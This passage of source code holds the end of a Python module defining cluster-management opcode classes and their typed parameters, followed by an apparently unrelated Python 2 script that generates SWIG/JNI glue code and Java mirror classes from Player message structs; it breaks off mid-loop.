If the node still has instances on it, the operation will fail. """ OP_DSC_FIELD = "node_name" OP_PARAMS = [ _PNodeName, ] class OpNodeAdd(OpCode): """Add a node to the cluster. @type node_name: C{str} @ivar node_name: The name of the node to add. This can be a short name, but it will be expanded to the FQDN. @type primary_ip: IP address @ivar primary_ip: The primary IP of the node. This will be ignored when the opcode is submitted, but will be filled during the node add (so it will be visible in the job query). @type secondary_ip: IP address @ivar secondary_ip: The secondary IP of the node. This needs to be passed if the cluster has been initialized in 'dual-network' mode, otherwise it must not be given. @type readd: C{bool} @ivar readd: Whether to re-add an existing node to the cluster. If this is not passed, then the operation will abort if the node name is already in the cluster; use this parameter to 'repair' a node that had its configuration broken, or was reinstalled without removal from the cluster. @type group: C{str} @ivar group: The node group to which this node will belong. 
@type vm_capable: C{bool} @ivar vm_capable: The vm_capable node attribute @type master_capable: C{bool} @ivar master_capable: The master_capable node attribute """ OP_DSC_FIELD = "node_name" OP_PARAMS = [ _PNodeName, ("primary_ip", None, ht.NoType, "Primary IP address"), ("secondary_ip", None, ht.TMaybeString, "Secondary IP address"), ("readd", False, ht.TBool, "Whether node is re-added to cluster"), ("group", None, ht.TMaybeString, "Initial node group"), ("master_capable", None, ht.TMaybeBool, "Whether node can become master or master candidate"), ("vm_capable", None, ht.TMaybeBool, "Whether node can host instances"), ("ndparams", None, ht.TMaybeDict, "Node parameters"), ] class OpNodeQuery(OpCode): """Compute the list of nodes.""" OP_PARAMS = [ _POutputFields, _PUseLocking, ("names", ht.EmptyList, ht.TListOf(ht.TNonEmptyString), "Empty list to query all nodes, node names otherwise"), ] class OpNodeQueryvols(OpCode): """Get list of volumes on node.""" OP_PARAMS = [ _POutputFields, ("nodes", ht.EmptyList, ht.TListOf(ht.TNonEmptyString), "Empty list to query all nodes, node names otherwise"), ] class OpNodeQueryStorage(OpCode): """Get information on storage for node(s).""" OP_PARAMS = [ _POutputFields, _PStorageType, ("nodes", ht.EmptyList, ht.TListOf(ht.TNonEmptyString), "List of nodes"), ("name", None, ht.TMaybeString, "Storage name"), ] class OpNodeModifyStorage(OpCode): """Modifies the properies of a storage unit""" OP_PARAMS = [ _PNodeName, _PStorageType, _PStorageName, ("changes", ht.NoDefault, ht.TDict, "Requested changes"), ] class OpRepairNodeStorage(OpCode): """Repairs the volume group on a node.""" OP_DSC_FIELD = "node_name" OP_PARAMS = [ _PNodeName, _PStorageType, _PStorageName, _PIgnoreConsistency, ] class OpNodeSetParams(OpCode): """Change the parameters of a node.""" OP_DSC_FIELD = "node_name" OP_PARAMS = [ _PNodeName, _PForce, ("master_candidate", None, ht.TMaybeBool, "Whether the node should become a master candidate"), ("offline", None, 
ht.TMaybeBool, "Whether the node should be marked as offline"), ("drained", None, ht.TMaybeBool, "Whether the node should be marked as drained"), ("auto_promote", False, ht.TBool, "Whether node(s) should be promoted to master candidate if necessary"), ("master_capable", None, ht.TMaybeBool, "Denote whether node can become master or master candidate"), ("vm_capable", None, ht.TMaybeBool, "Denote whether node can host instances"), ("secondary_ip", None, ht.TMaybeString, "Change node's secondary IP address"), ("ndparams", None, ht.TMaybeDict, "Set node parameters"), ("powered", None, ht.TMaybeBool, "Whether the node should be marked as powered"), ] class OpNodePowercycle(OpCode): """Tries to powercycle a node.""" OP_DSC_FIELD = "node_name" OP_PARAMS = [ _PNodeName, _PForce, ] class OpNodeMigrate(OpCode): """Migrate all instances from a node.""" OP_DSC_FIELD = "node_name" OP_PARAMS = [ _PNodeName, _PMigrationMode, _PMigrationLive, _PMigrationTargetNode, ("iallocator", None, ht.TMaybeString, "Iallocator for deciding the target node for shared-storage instances"), ] class OpNodeEvacStrategy(OpCode): """Compute the evacuation strategy for a list of nodes.""" OP_DSC_FIELD = "nodes" OP_PARAMS = [ ("nodes", ht.NoDefault, ht.TListOf(ht.TNonEmptyString), None), ("remote_node", None, ht.TMaybeString, None), ("iallocator", None, ht.TMaybeString, None), ] # instance opcodes class OpInstanceCreate(OpCode): """Create an instance. 
@ivar instance_name: Instance name @ivar mode: Instance creation mode (one of L{constants.INSTANCE_CREATE_MODES}) @ivar source_handshake: Signed handshake from source (remote import only) @ivar source_x509_ca: Source X509 CA in PEM format (remote import only) @ivar source_instance_name: Previous name of instance (remote import only) @ivar source_shutdown_timeout: Shutdown timeout used for source instance (remote import only) """ OP_DSC_FIELD = "instance_name" OP_PARAMS = [ _PInstanceName, _PForceVariant, _PWaitForSync, _PNameCheck, ("beparams", ht.EmptyDict, ht.TDict, "Backend parameters for instance"), ("disks", ht.NoDefault, # TODO: Generate check from constants.IDISK_PARAMS_TYPES ht.TListOf(ht.TDictOf(ht.TElemOf(constants.IDISK_PARAMS), ht.TOr(ht.TNonEmptyString, ht.TInt))), "Disk descriptions, for example ``[{\"%s\": 100}, {\"%s\": 5}]``;" " each disk definition must contain a ``%s`` value and" " can contain an optional ``%s`` value denoting the disk access mode" " (%s)" % (constants.IDISK_SIZE, constants.IDISK_SIZE, constants.IDISK_SIZE, constants.IDISK_MODE, " or ".join("``%s``" % i for i in sorted(constants.DISK_ACCESS_SET)))), ("disk_template", ht.NoDefault, _CheckDiskTemplate, "Disk template"), ("file_driver", None, ht.TOr(ht.TNone, ht.TElemOf(constants.FILE_DRIVER)), "Driver for file-backed disks"), ("file_storage_dir", None, ht.TMaybeString, "Directory for storing file-backed disks"), ("hvparams", ht.EmptyDict, ht.TDict, "Hypervisor parameters for instance, hypervisor-dependent"), ("hypervisor", None, ht.TMaybeString, "Hypervisor"), ("iallocator", None, ht.TMaybeString, "Iallocator for deciding which node(s) to use"), ("identify_defaults", False, ht.TBool, "Reset instance parameters to default if equal"), ("ip_check", True, ht.TBool, _PIpCheckDoc), ("mode", ht.NoDefault, ht.TElemOf(constants.INSTANCE_CREATE_MODES), "Instance creation mode"), ("nics", ht.NoDefault, ht.TListOf(_TestNicDef), "List of NIC (network interface) definitions, for example" " 
``[{}, {}, {\"%s\": \"198.51.100.4\"}]``; each NIC definition can" " contain the optional values %s" % (constants.INIC_IP, ", ".join("``%s``" % i for i in sorted(constants.INIC_PARAMS)))), ("no_install", None, ht.TMaybeBool, "Do not install the OS (will disable automatic start)"), ("osparams", ht.EmptyDict, ht.TDict, "OS parameters for instance"), ("os_type", None, ht.TMaybeString, "Operating system"), ("pnode", None, ht.TMaybeString, "Primary node"), ("snode", None, ht.TMaybeString, "Secondary node"), ("source_handshake", None, ht.TOr(ht.TList, ht.TNone), "Signed handshake from source (remote import only)"), ("source_instance_name", None, ht.TMaybeString, "Source instance name (remote import only)"), ("source_shutdown_timeout", constants.DEFAULT_SHUTDOWN_TIMEOUT, ht.TPositiveInt, "How long source instance was given to shut down (remote import only)"), ("source_x509_ca", None, ht.TMaybeString, "Source X509 CA in PEM format (remote import only)"), ("src_node", None, ht.TMaybeString, "Source node for import"), ("src_path", None, ht.TMaybeString, "Source directory for import"), ("start", True, ht.TBool, "Whether to start instance after creation"), ("tags", ht.EmptyList, ht.TListOf(ht.TNonEmptyString), "Instance tags"), ] class OpInstanceReinstall(OpCode): """Reinstall an instance's OS.""" OP_DSC_FIELD = "instance_name" OP_PARAMS = [ _PInstanceName, _PForceVariant, ("os_type", None, ht.TMaybeString, "Instance operating system"), ("osparams", None, ht.TMaybeDict, "Temporary OS parameters"), ] class OpInstanceRemove(OpCode): """Remove an instance.""" OP_DSC_FIELD = "instance_name" OP_PARAMS = [ _PInstanceName, _PShutdownTimeout, ("ignore_failures", False, ht.TBool, "Whether to ignore failures during removal"), ] class OpInstanceRename(OpCode): """Rename an instance.""" OP_PARAMS = [ _PInstanceName, _PNameCheck, ("new_name", ht.NoDefault, ht.TNonEmptyString, "New instance name"), ("ip_check", False, ht.TBool, _PIpCheckDoc), ] class OpInstanceStartup(OpCode): """Startup an 
instance.""" OP_DSC_FIELD = "instance_name" OP_PARAMS = [ _PInstanceName, _PForce, _PIgnoreOfflineNodes, ("hvparams", ht.EmptyDict, ht.TDict, "Temporary hypervisor parameters, hypervisor-dependent"), ("beparams", ht.EmptyDict, ht.TDict, "Temporary backend parameters"), _PNoRemember, ] class OpInstanceShutdown(OpCode): """Shutdown an instance.""" OP_DSC_FIELD = "instance_name" OP_PARAMS = [ _PInstanceName, _PIgnoreOfflineNodes, ("timeout", constants.DEFAULT_SHUTDOWN_TIMEOUT, ht.TPositiveInt, "How long to wait for instance to shut down"), _PNoRemember, ] class OpInstanceReboot(OpCode): """Reboot an instance.""" OP_DSC_FIELD = "instance_name" OP_PARAMS = [ _PInstanceName, _PShutdownTimeout, ("ignore_secondaries", False, ht.TBool, "Whether to start the instance even if secondary disks are failing"), ("reboot_type", ht.NoDefault, ht.TElemOf(constants.REBOOT_TYPES), "How to reboot instance"), ] class OpInstanceReplaceDisks(OpCode): """Replace the disks of an instance.""" OP_DSC_FIELD = "instance_name" OP_PARAMS = [ _PInstanceName, ("mode", ht.NoDefault, ht.TElemOf(constants.REPLACE_MODES), "Replacement mode"), ("disks", ht.EmptyList, ht.TListOf(ht.TPositiveInt), "Disk indexes"), ("remote_node", None, ht.TMaybeString, "New secondary node"), ("iallocator", None, ht.TMaybeString, "Iallocator for deciding new secondary node"), ("early_release", False, ht.TBool, "Whether to release locks as soon as possible"), ] class OpInstanceFailover(OpCode): """Failover an instance.""" OP_DSC_FIELD = "instance_name" OP_PARAMS = [ _PInstanceName, _PShutdownTimeout, _PIgnoreConsistency, _PMigrationTargetNode, ("iallocator", None, ht.TMaybeString, "Iallocator for deciding the target node for shared-storage instances"), ] class OpInstanceMigrate(OpCode): """Migrate an instance. This migrates (without shutting down an instance) to its secondary node. 
@ivar instance_name: the name of the instance @ivar mode: the migration mode (live, non-live or None for auto) """ OP_DSC_FIELD = "instance_name" OP_PARAMS = [ _PInstanceName, _PMigrationMode, _PMigrationLive, _PMigrationTargetNode, ("cleanup", False, ht.TBool, "Whether a previously failed migration should be cleaned up"), ("iallocator", None, ht.TMaybeString, "Iallocator for deciding the target node for shared-storage instances"), ("allow_failover", False, ht.TBool, "Whether we can fallback to failover if migration is not possible"), ] class OpInstanceMove(OpCode): """Move an instance. This move (with shutting down an instance and data copying) to an arbitrary node. @ivar instance_name: the name of the instance @ivar target_node: the destination node """ OP_DSC_FIELD = "instance_name" OP_PARAMS = [ _PInstanceName, _PShutdownTimeout, ("target_node", ht.NoDefault, ht.TNonEmptyString, "Target node"), _PIgnoreConsistency, ] class OpInstanceConsole(OpCode): """Connect to an instance's console.""" OP_DSC_FIELD = "instance_name" OP_PARAMS = [ _PInstanceName ] class OpInstanceActivateDisks(OpCode): """Activate an instance's disks.""" OP_DSC_FIELD = "instance_name" OP_PARAMS = [ _PInstanceName, ("ignore_size", False, ht.TBool, "Whether to ignore recorded size"), ] class OpInstanceDeactivateDisks(OpCode): """Deactivate an instance's disks.""" OP_DSC_FIELD = "instance_name" OP_PARAMS = [ _PInstanceName, _PForce, ] class OpInstanceRecreateDisks(OpCode): """Deactivate an instance's disks.""" OP_DSC_FIELD = "instance_name" OP_PARAMS = [ _PInstanceName, ("disks", ht.EmptyList, ht.TListOf(ht.TPositiveInt), "List of disk indexes"), ("nodes", ht.EmptyList, ht.TListOf(ht.TNonEmptyString), "New instance nodes, if relocation is desired"), ] class OpInstanceQuery(OpCode): """Compute the list of instances.""" OP_PARAMS = [ _POutputFields, _PUseLocking, ("names", ht.EmptyList, ht.TListOf(ht.TNonEmptyString), "Empty list to query all instances, instance names otherwise"), ] class 
OpInstanceQueryData(OpCode): """Compute the run-time status of instances.""" OP_PARAMS = [ _PUseLocking, ("instances", ht.EmptyList, ht.TListOf(ht.TNonEmptyString), "Instance names"), ("static", False, ht.TBool, "Whether to only return configuration data without querying" " nodes"), ] class OpInstanceSetParams(OpCode): """Change the parameters of an instance.""" OP_DSC_FIELD = "instance_name" OP_PARAMS = [ _PInstanceName, _PForce, _PForceVariant, # TODO: Use _TestNicDef ("nics", ht.EmptyList, ht.TList, "List of NIC changes. Each item is of the form ``(op, settings)``." " ``op`` can be ``%s`` to add a new NIC with the specified settings," " ``%s`` to remove the last NIC or a number to modify the settings" " of the NIC with that index." % (constants.DDM_ADD, constants.DDM_REMOVE)), ("disks", ht.EmptyList, ht.TList, "List of disk changes. See ``nics``."), ("beparams", ht.EmptyDict, ht.TDict, "Per-instance backend parameters"), ("hvparams", ht.EmptyDict, ht.TDict, "Per-instance hypervisor parameters, hypervisor-dependent"), ("disk_template", None, ht.TOr(ht.TNone, _CheckDiskTemplate), "Disk template for instance"), ("remote_node", None, ht.TMaybeString, "Secondary node (used when changing disk template)"), ("os_name", None, ht.TMaybeString, "Change instance's OS name. 
Does not reinstall the instance."), ("osparams", None, ht.TMaybeDict, "Per-instance OS parameters"), ("wait_for_sync", True, ht.TBool, "Whether to wait for the disk to synchronize, when changing template"), ] class OpInstanceGrowDisk(OpCode): """Grow a disk of an instance.""" OP_DSC_FIELD = "instance_name" OP_PARAMS = [ _PInstanceName, _PWaitForSync, ("disk", ht.NoDefault, ht.TInt, "Disk index"), ("amount", ht.NoDefault, ht.TInt, "Amount of disk space to add (megabytes)"), ] # Node group opcodes class OpGroupAdd(OpCode): """Add a node group to the cluster.""" OP_DSC_FIELD = "group_name" OP_PARAMS = [ _PGroupName, _PNodeGroupAllocPolicy, _PGroupNodeParams, ] class OpGroupAssignNodes(OpCode): """Assign nodes to a node group.""" OP_DSC_FIELD = "group_name" OP_PARAMS = [ _PGroupName, _PForce, ("nodes", ht.NoDefault, ht.TListOf(ht.TNonEmptyString), "List of nodes to assign"), ] class OpGroupQuery(OpCode): """Compute the list of node groups.""" OP_PARAMS = [ _POutputFields, ("names", ht.EmptyList, ht.TListOf(ht.TNonEmptyString), "Empty list to query all groups, group names otherwise"), ] class OpGroupSetParams(OpCode): """Change the parameters of a node group.""" OP_DSC_FIELD = "group_name" OP_PARAMS = [ _PGroupName, _PNodeGroupAllocPolicy, _PGroupNodeParams, ] class OpGroupRemove(OpCode): """Remove a node group from the cluster.""" OP_DSC_FIELD = "group_name" OP_PARAMS = [ _PGroupName, ] class OpGroupRename(OpCode): """Rename a node group in the cluster.""" OP_PARAMS = [ _PGroupName, ("new_name", ht.NoDefault, ht.TNonEmptyString, "New group name"), ] # OS opcodes class OpOsDiagnose(OpCode): """Compute the list of guest operating systems.""" OP_PARAMS = [ _POutputFields, ("names", ht.EmptyList, ht.TListOf(ht.TNonEmptyString), "Which operating systems to diagnose"), ] # Exports opcodes class OpBackupQuery(OpCode): """Compute the list of exported images.""" OP_PARAMS = [ _PUseLocking, ("nodes", ht.EmptyList, ht.TListOf(ht.TNonEmptyString), "Empty list to query all nodes, 
node names otherwise"), ] class OpBackupPrepare(OpCode): """Prepares an instance export. @ivar instance_name: Instance name @ivar mode: Export mode (one of L{constants.EXPORT_MODES}) """ OP_DSC_FIELD = "instance_name" OP_PARAMS = [ _PInstanceName, ("mode", ht.NoDefault, ht.TElemOf(constants.EXPORT_MODES), "Export mode"), ] class OpBackupExport(OpCode): """Export an instance. For local exports, the export destination is the node name. For remote exports, the export destination is a list of tuples, each consisting of hostname/IP address, port, HMAC and HMAC salt. The HMAC is calculated using the cluster domain secret over the value "${index}:${hostname}:${port}". The destination X509 CA must be a signed certificate. @ivar mode: Export mode (one of L{constants.EXPORT_MODES}) @ivar target_node: Export destination @ivar x509_key_name: X509 key to use (remote export only) @ivar destination_x509_ca: Destination X509 CA in PEM format (remote export only) """ OP_DSC_FIELD = "instance_name" OP_PARAMS = [ _PInstanceName, _PShutdownTimeout, # TODO: Rename target_node as it changes meaning for different export modes # (e.g. 
"destination") ("target_node", ht.NoDefault, ht.TOr(ht.TNonEmptyString, ht.TList), "Destination information, depends on export mode"), ("shutdown", True, ht.TBool, "Whether to shutdown instance before export"), ("remove_instance", False, ht.TBool, "Whether to remove instance after export"), ("ignore_remove_failures", False, ht.TBool, "Whether to ignore failures while removing instances"), ("mode", constants.EXPORT_MODE_LOCAL, ht.TElemOf(constants.EXPORT_MODES), "Export mode"), ("x509_key_name", None, ht.TOr(ht.TList, ht.TNone), "Name of X509 key (remote export only)"), ("destination_x509_ca", None, ht.TMaybeString, "Destination X509 CA (remote export only)"), ] class OpBackupRemove(OpCode): """Remove an instance's export.""" OP_DSC_FIELD = "instance_name" OP_PARAMS = [ _PInstanceName, ] # Tags opcodes class OpTagsGet(OpCode): """Returns the tags of the given object.""" OP_DSC_FIELD = "name" OP_PARAMS = [ _PTagKind, # Name is only meaningful for nodes and instances ("name", ht.NoDefault, ht.TMaybeString, None), ] class OpTagsSearch(OpCode): """Searches the tags in the cluster for a given pattern.""" OP_DSC_FIELD = "pattern" OP_PARAMS = [ ("pattern", ht.NoDefault, ht.TNonEmptyString, None), ] class OpTagsSet(OpCode): """Add a list of tags on a given object.""" OP_PARAMS = [ _PTagKind, _PTags, # Name is only meaningful for nodes and instances ("name", ht.NoDefault, ht.TMaybeString, None), ] class OpTagsDel(OpCode): """Remove a list of tags from a given object.""" OP_PARAMS = [ _PTagKind, _PTags, # Name is only meaningful for nodes and instances ("name", ht.NoDefault, ht.TMaybeString, None), ] # Test opcodes class OpTestDelay(OpCode): """Sleeps for a configured amount of time. This is used just for debugging and testing. Parameters: - duration: the time to sleep - on_master: if true, sleep on the master - on_nodes: list of nodes in which to sleep If the on_master parameter is true, it will execute a sleep on the master (before any node sleep). 
If the on_nodes list is not empty, it will sleep on those nodes (after the sleep on the master, if that is enabled). As an additional feature, the case of duration < 0 will be reported as an execution error, so this opcode can be used as a failure generator. The case of duration == 0 will not be treated specially. """ OP_DSC_FIELD = "duration" OP_PARAMS = [ ("duration", ht.NoDefault, ht.TFloat, None), ("on_master", True, ht.TBool, None), ("on_nodes", ht.EmptyList, ht.TListOf(ht.TNonEmptyString), None), ("repeat", 0, ht.TPositiveInt, None), ] class OpTestAllocator(OpCode): """Allocator framework testing. This opcode has two modes: - gather and return allocator input for a given mode (allocate new or replace secondary) and a given instance definition (direction 'in') - run a selected allocator for a given operation (as above) and return the allocator output (direction 'out') """ OP_DSC_FIELD = "allocator" OP_PARAMS = [ ("direction", ht.NoDefault, ht.TElemOf(constants.VALID_IALLOCATOR_DIRECTIONS), None), ("mode", ht.NoDefault, ht.TElemOf(constants.VALID_IALLOCATOR_MODES), None), ("name", ht.NoDefault, ht.TNonEmptyString, None), ("nics", ht.NoDefault, ht.TOr(ht.TNone, ht.TListOf( ht.TDictOf(ht.TElemOf([constants.INIC_MAC, constants.INIC_IP, "bridge"]), ht.TOr(ht.TNone, ht.TNonEmptyString)))), None), ("disks", ht.NoDefault, ht.TOr(ht.TNone, ht.TList), None), ("hypervisor", None, ht.TMaybeString, None), ("allocator", None, ht.TMaybeString, None), ("tags", ht.EmptyList, ht.TListOf(ht.TNonEmptyString), None), ("memory", None, ht.TOr(ht.TNone, ht.TPositiveInt), None), ("vcpus", None, ht.TOr(ht.TNone, ht.TPositiveInt), None), ("os", None, ht.TMaybeString, None), ("disk_template", None, ht.TMaybeString, None), ("evac_nodes", None, ht.TOr(ht.TNone, ht.TListOf(ht.TNonEmptyString)), None), ("instances", None, ht.TOr(ht.TNone, ht.TListOf(ht.TNonEmptyString)), None), ("evac_mode", None, ht.TOr(ht.TNone, ht.TElemOf(constants.IALLOCATOR_NEVAC_MODES)), None), ("target_groups", None, 
ht.TOr(ht.TNone, ht.TListOf(ht.TNonEmptyString)), None), ] class OpTestJqueue(OpCode): """Utility opcode to test some aspects of the job queue. """ OP_PARAMS = [ ("notify_waitlock", False, ht.TBool, None), ("notify_exec", False, ht.TBool, None), ("log_messages", ht.EmptyList, ht.TListOf(ht.TString), None), ("fail", False, ht.TBool, None), ] class OpTestDummy(OpCode): """Utility opcode used by unittests. """ OP_PARAMS = [ ("result", ht.NoDefault, ht.NoType, None), ("messages", ht.NoDefault, ht.NoType, None), ("fail", ht.NoDefault, ht.NoType, None), ("submit_jobs", None, ht.NoType, None), ] WITH_LU = False def _GetOpList(): """Returns list of all defined opcodes. Does not eliminate duplicates by C{OP_ID}. """ return [v for v in globals().values() if (isinstance(v, type) and issubclass(v, OpCode) and hasattr(v, "OP_ID") and v is not OpCode)] OP_MAPPING = dict((v.OP_ID, v) for v in _GetOpList())
uml-robotics/player-2.1.3
libplayercore/bindings/java/parse.py
#!/usr/bin/env python

"""Generate SWIG/JNI glue code for Player message structs.

Reads a (preprocessed) player.h, finds every ``typedef struct player_*``
declaration, and emits:

  * <playercore_casts.i>: C helpers (a sizeof function plus void* casts)
    inside a SWIG %inline block;
  * <playercore_arraysofclasses.i>: JAVA_ARRAYSOFCLASSES macros so SWIG
    can expose Java arrays of each struct type;
  * one serializable plain-Java mirror class J<struct> per struct, written
    into the <Jplayercore> directory;
  * <playercore>/<player.java>: static converter methods between the
    SWIG-generated proxy objects and the plain-Java mirror classes.

Python 2 script (print statements, backtick repr, ``string`` module);
intended to be run from the build system.
"""

import re
import string
import sys
import os

USAGE = 'USAGE: parse.y <player.h> <playercore_casts.i> <playercore_arraysofclasses.i> <Jplayercore> <playercore> <player.java>'

if __name__ == '__main__':
    if len(sys.argv) != 7:
        print USAGE
        sys.exit(-1)

    # Positional arguments; see USAGE above.
    infilename = sys.argv[1]
    outfilename = sys.argv[2]
    aofcfilename = sys.argv[3]
    outdir = sys.argv[4]
    pcoutdir = sys.argv[5]
    pcjfilename = sys.argv[6]

    # Make sure the output directories exist before opening files in them.
    os.system('mkdir -p ' + outdir)
    os.system('mkdir -p ' + pcoutdir)

    # Read in the entire file
    infile = open(infilename, 'r')
    instream = infile.read()
    infile.close()

    outfile = open(outfilename, 'w+')
    aofcfile = open(aofcfilename, 'w+')
    pcjfile = open(pcoutdir + '/' + pcjfilename, 'w+')

    # strip C++-style comments
    pattern = re.compile('//.*')
    instream = pattern.sub('', instream)

    # strip C-style comments
    pattern = re.compile('/\*.*?\*/', re.MULTILINE | re.DOTALL)
    instream = pattern.sub('', instream)

    # strip blank lines
    pattern = re.compile('^\s*?\n', re.MULTILINE)
    instream = pattern.sub('', instream)

    # find structs
    pattern = re.compile('typedef\s+struct\s+player_\w+[^}]+\}[^;]+', re.MULTILINE)
    structs = pattern.findall(instream)
    print 'Found ' + `len(structs)` + ' struct(s)'

    # Helper regexes used while walking each struct body:
    #   contentspattern - grabs everything between the braces
    #   declpattern     - one ';'-terminated member declaration at a time
    #   typepattern     - the leading type token of a declaration
    #   variablepattern - each comma-separated variable name
    #   arraypattern    - a '[...]' array-size suffix (digits or a constant name)
    contentspattern = re.compile('.*\{\s*(.*?)\s*\}', re.MULTILINE | re.DOTALL)
    declpattern = re.compile('\s*([^;]*?;)', re.MULTILINE)
    typepattern = re.compile('\s*\S+')
    variablepattern = re.compile('\s*([^,;]+?)\s*[,;]')
    #arraypattern = re.compile('\[\s*(\w*?)\s*\]')
    arraypattern = re.compile('\[(.*?)\]')

    outfile.write('%inline\n%{\n\n')
    pcjfile.write('package net.sourceforge.playerstage.Jplayercore;\n')
    pcjfile.write('public class player {\n\n')

    for s in structs:
        # extract type of struct (the typedef alias is the last token)
        split = string.split(s)
        typename = split[-1]

        # pick out the contents of the struct
        varpart = contentspattern.findall(s)
        if len(varpart) != 1:
            print 'skipping nested / empty struct ' + typename
            continue

        # SWIG macro that lets us access arrays of this non-primitive type
        # as Java arrays
        aofcfile.write('JAVA_ARRAYSOFCLASSES(' + typename +')\n')

        # Names of the generated helper functions for this struct.
        buf_to_name = 'buf_to_' + typename
        buf_from_name = typename + '_to_buf'
        buf_to_Jname = 'buf_to_J' + typename
        buf_from_Jname = 'J' + typename + '_to_buf'
        sizeof_name = typename + '_sizeof'

        # function to return the size of the underlying C structure
        outfile.write('size_t ' + sizeof_name + '(void)\n')
        outfile.write('{\n')
        outfile.write(' return(sizeof(' + typename + '));\n')
        outfile.write('}\n')

        # JNI cast from a void* to a pointer to this type
        outfile.write(typename + '* ' + buf_to_name + '(void* buf)\n')
        outfile.write('{\n')
        outfile.write(' return((' + typename + '*)(buf));\n')
        outfile.write('}\n')

        # JNI cast from a pointer to this type to a void*
        outfile.write('void* ' + buf_from_name + '(' + typename + '* msg)\n')
        outfile.write('{\n')
        outfile.write(' return((void*)(msg));\n')
        outfile.write('}\n')

        # Equivalent non-JNI Java class; serialVersionUID is derived from a
        # hash of the struct's source text so it changes when the layout does.
        # NOTE(review): hash() is not stable across Python versions/platforms
        # -- confirm that regeneration on another host is acceptable.
        jclass = 'J' + typename
        jfile = open(outdir + '/' + jclass + '.java', 'w+')
        jfile.write('package net.sourceforge.playerstage.Jplayercore;\n')
        jfile.write('import java.io.Serializable;\n')
        jfile.write('public class ' + jclass + ' implements Serializable {\n')
        jfile.write(' public final static long serialVersionUID = ' + `hash(s)` + 'L;\n')
        jclass_constructor = ' public ' + jclass + '() {\n';

        # Static method in class player to convert from JNI Java object to
        # non-JNI java object
        pcj_data_to_jdata = ''
        pcj_data_to_jdata += ' public static ' + jclass + ' ' + typename + '_to_' + jclass + '(' + typename + ' data) {\n'
        pcj_data_to_jdata += ' ' + jclass + ' Jdata = new ' + jclass + '();\n'

        # Static method in class player to convert from non-JNI Java object to
        # JNI java object
        pcj_jdata_to_data = ''
        pcj_jdata_to_data += ' public static ' + typename + ' ' + jclass + '_to_' + typename + '(' + jclass + ' Jdata) {\n'
        pcj_jdata_to_data += ' ' + typename + ' data = new ' + typename + '();\n'

        # Static method in class playercore to convert from SWIGTYPE_p_void
        # to non-JNI Java object.
        pcjfile.write(' public static ' + jclass + ' ' + buf_to_Jname + '(SWIGTYPE_p_void buf) {\n')
        pcjfile.write(' ' + typename + ' data = playercore_java.' + buf_to_name + '(buf);\n')
        pcjfile.write(' return(' + typename + '_to_' + jclass + '(data));\n')
        pcjfile.write(' }\n\n')

        # Static method in class playercore to convert non-JNI Java object to
        # SWIGTYPE_p_void.
        pcjfile.write(' public static SWIGTYPE_p_void ' + buf_from_Jname + '(' + jclass + ' Jdata) {\n')
        pcjfile.write(' ' + typename + ' data = ' + jclass + '_to_' + typename + '(Jdata);\n')
        pcjfile.write(' return(playercore_java.' + buf_from_name + '(data));\n')
        pcjfile.write(' }\n\n')

        # separate the variable declarations
        decls = declpattern.finditer(varpart[0])
        for d in decls:
            # find the type and variable names in this declaration
            dstring = d.string[d.start(1):d.end(1)]
            type = typepattern.findall(dstring)[0]
            dstring = typepattern.sub('', dstring, 1)
            vars = variablepattern.finditer(dstring)

            # Do some name mangling for common types: map fixed-width C types
            # onto Java primitives wide enough to hold them (unsigned types go
            # to the next-larger signed Java type).
            builtin_type = 1
            if type == 'int64_t':
                jtype = 'long'
            elif type == 'uint64_t':
                jtype = 'long'
            elif type == 'int32_t':
                jtype = 'int'
            elif type == 'uint32_t':
                jtype = 'long'
            elif type == 'int16_t':
                jtype = 'short'
            elif type == 'uint16_t':
                jtype = 'int'
            elif type == 'int8_t':
                jtype = 'byte'
            elif type == 'uint8_t':
                jtype = 'short'
            elif type == 'char':
                jtype = 'char'
            elif type == 'bool_t':
                jtype = 'boolean'
            elif type == 'double':
                jtype = 'double'
            elif type == 'float':
                jtype = 'float'
            else:
                # rely on a previous declaration of a J class for this type
                jtype = 'J' + type
                builtin_type = 0

            # iterate through each variable
            for var in vars:
                varstring = var.string[var.start(1):var.end(1)]

                # is it an array or a scalar?
                arraysize = arraypattern.findall(varstring)
                if len(arraysize) > 0:
                    # Array member: char[] becomes a Java String, everything
                    # else a Java array allocated in the constructor.
                    arraysize = arraysize[0]
                    varstring = arraypattern.sub('', varstring)
                    if jtype == 'char':
                        jfile.write(' public String ' + varstring + ';\n')
                    else:
                        jfile.write(' public ' + jtype + '[] ' + varstring + ';\n')
                    #if builtin_type == 0:
                    if jtype != 'char':
                        # Non-numeric sizes are assumed to be PLAYER_* constants
                        # exported by SWIG as playercore_javaConstants members.
                        if arraysize.isdigit():
                            jclass_constructor += ' ' + varstring + ' = new ' + jtype + '[' + arraysize + '];\n'
                        else:
                            jclass_constructor += ' ' + varstring + ' = new ' + jtype + '[playercore_javaConstants.' + arraysize + '];\n'
                else:
                    # Scalar member.
                    arraysize = ''
                    jfile.write(' public ' + jtype + ' ' + varstring + ';\n')
                    if builtin_type == 0:
                        jclass_constructor += ' ' + varstring + ' = new ' + jtype + '();\n'

                # SWIG generates JavaBean-style accessors, so build the
                # getFoo/setFoo name from the member name.
                capvarstring = string.capitalize(varstring[0]) + varstring[1:]
                if builtin_type:
                    # Primitive (or String): copy straight through the accessors.
                    pcj_data_to_jdata += ' Jdata.' + varstring + ' = data.get' + capvarstring + '();\n'
                    pcj_jdata_to_data += ' data.set' + capvarstring + '(Jdata.' + varstring +');\n'
                else:
                    if arraysize == '':
                        # Nested struct scalar: convert via the J<type> converters.
                        pcj_data_to_jdata += ' Jdata.' + varstring + ' = ' + type + '_to_' + jtype + '(data.get' + capvarstring + '());\n'
                        pcj_jdata_to_data += ' data.set' + capvarstring + '(' + jtype + '_to_' + type + '(Jdata.' + varstring + '));\n'
                    else:
                        # Nested struct array: emit an element-by-element
                        # conversion loop in the generated Java.
                        try:
                            asize = int(arraysize)
                        except:
                            arraysize = 'playercore_javaConstants.' + arraysize
                        pcj_data_to_jdata += ' {\n'
                        pcj_data_to_jdata += ' ' + type + ' foo[] = data.get' + capvarstring + '();\n'
                        pcj_data_to_jdata += ' for(int i=0;i<' + arraysize + ';i++)\n'
                        pcj_data_to_jdata += ' Jdata.' + varstring + '[i] = ' + type + '_to_' + jtype + '(foo[i]);\n'
                        pcj_data_to_jdata += ' }\n'
                        pcj_jdata_to_data += ' {\n'
                        pcj_jdata_to_data += ' ' + type + ' foo[] = new ' + type + '[' + arraysize + '];\n'
                        pcj_jdata_to_data += ' for(int i=0;i<' + arraysize + ';i++)\n'
